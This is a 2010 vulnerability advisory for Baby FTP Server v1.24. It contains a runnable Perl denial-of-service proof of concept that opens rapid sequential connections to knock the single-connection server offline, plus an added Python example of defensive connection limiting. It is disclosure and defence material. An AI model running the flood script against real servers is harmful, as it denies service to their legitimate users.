Baby FTP Server DoS



[DCA-0004]

[Software]

- Baby FTP Server

[Vendor Product Description]

- Baby FTP server has only the most necessary features and is yet
powerful enough to be a basis for a more complex server

[Bug Description]

- The FTP server cannot handle multiple or simultaneous connections,
so a rapid series of connections results in a denial of service

[History]

- Advisory sent to vendor on 06/14/2010.
- No response from vendor.
- Public advisory & exploit 08/02/2010.

[Impact]

- Low

[Affected Version]

- Baby FTP Server v1.24
- Prior versions may also be vulnerable

[Code]

#!/usr/bin/perl
# Proof of concept from the advisory: opens and immediately closes a
# series of TCP connections to the target port. A server that serves
# one connection at a time stops answering other clients while it
# works through them.
use strict;
use warnings;
use IO::Socket;

usage() if (@ARGV < 3);    # needs host, port and connection count

my $ip   = $ARGV[0];
my $port = $ARGV[1];
my $conn = $ARGV[2];       # number of connections to open

my $num = 0;

print "[+] Sending request...\n";

while ( $num <= $conn ) {
    system("echo -n .");   # progress dot, one per connection
    my $s = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$ip", PeerPort => "$port")
        || die "[-] Connection FAILED!\n";

    close($s);
    $num++;
}

print "\n[+] Done!\n";

sub usage {
    print "[-] Usage: <" . $0 . "> <ip> <port> <connections>\n";
    print "[-] Example: " . $0 . " 127.0.0.1 21 1200\n";
    exit;
}

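The weakness behind the PoC is a server that serves one connection at a time, so a sequential connect-and-close loop starves every other client. As an added example that is not part of the advisory and not Baby FTP Server's code, the following minimal Python listener shows the two mitigations a defender would expect: a thread per session so the accept loop never blocks, and a per-source and overall cap on live sessions that answers excess connections with a 421 reply and closes them. The banner text, the limits and the 5-second idle timeout are assumptions.

```python
import socket
import threading
from collections import Counter

BANNER = b"220 Service ready\r\n"  # constructed banner, not Baby FTP Server's own text
REJECT = b"421 Too many connections, try again later\r\n"  # RFC 959 "service not available"

class ConnectionLimiter:  # live-session counters per source address and overall, under one lock
    def __init__(self, per_source, total):
        self.per_source, self.total = per_source, total
        self._lock, self._per_src, self._live = threading.Lock(), Counter(), 0
    def acquire(self, src_ip):
        with self._lock:
            if self._live >= self.total or self._per_src[src_ip] >= self.per_source:
                return False
            self._live, self._per_src[src_ip] = self._live + 1, self._per_src[src_ip] + 1
            return True
    def release(self, src_ip):
        with self._lock:
            self._live, self._per_src[src_ip] = self._live - 1, self._per_src[src_ip] - 1

def serve_session(conn, src_ip, limiter):  # admit or reject at once; slot freed on quit, close or timeout
    with conn:
        if not limiter.acquire(src_ip):
            conn.sendall(REJECT)
            return
        try:
            conn.sendall(BANNER)
            while (line := conn.recv(512)) and not line.upper().startswith(b"QUIT"):
                conn.sendall(b"502 Command not implemented\r\n")
            conn.sendall(b"221 Goodbye\r\n")
        except OSError:
            pass  # idle timeout or reset: just drop the session
        finally:
            limiter.release(src_ip)

def start_server(host, port, limiter, idle_timeout=5.0):  # one thread per session, so a burst never blocks accept
    lsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    lsock.bind((host, port))
    lsock.listen(128)  # backlog deep enough that a connect burst is queued rather than refused
    def accept_loop():
        while True:
            try:
                conn, (src_ip, _) = lsock.accept()
            except OSError:  # listening socket closed by the caller: shut down
                return
            conn.settimeout(idle_timeout)  # an idle client cannot hold its slot forever
            threading.Thread(target=serve_session, args=(conn, src_ip, limiter), daemon=True).start()
    threading.Thread(target=accept_loop, daemon=True).start()
    return lsock, lsock.getsockname()[1]  # close lsock to stop; the port matters when 0 was passed
```

With per_source=2, a third simultaneous session from one address receives 421 while the earlier sessions keep working, which is the behaviour the PoC's loop cannot trigger against a concurrent server.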

[Credits]

Rodrigo Escobar (ipax)
Pentester/Researcher Security Team @ DcLabs
http://www.dclabs.com.br 


[Greetz]
Crash and all Dclabs members.
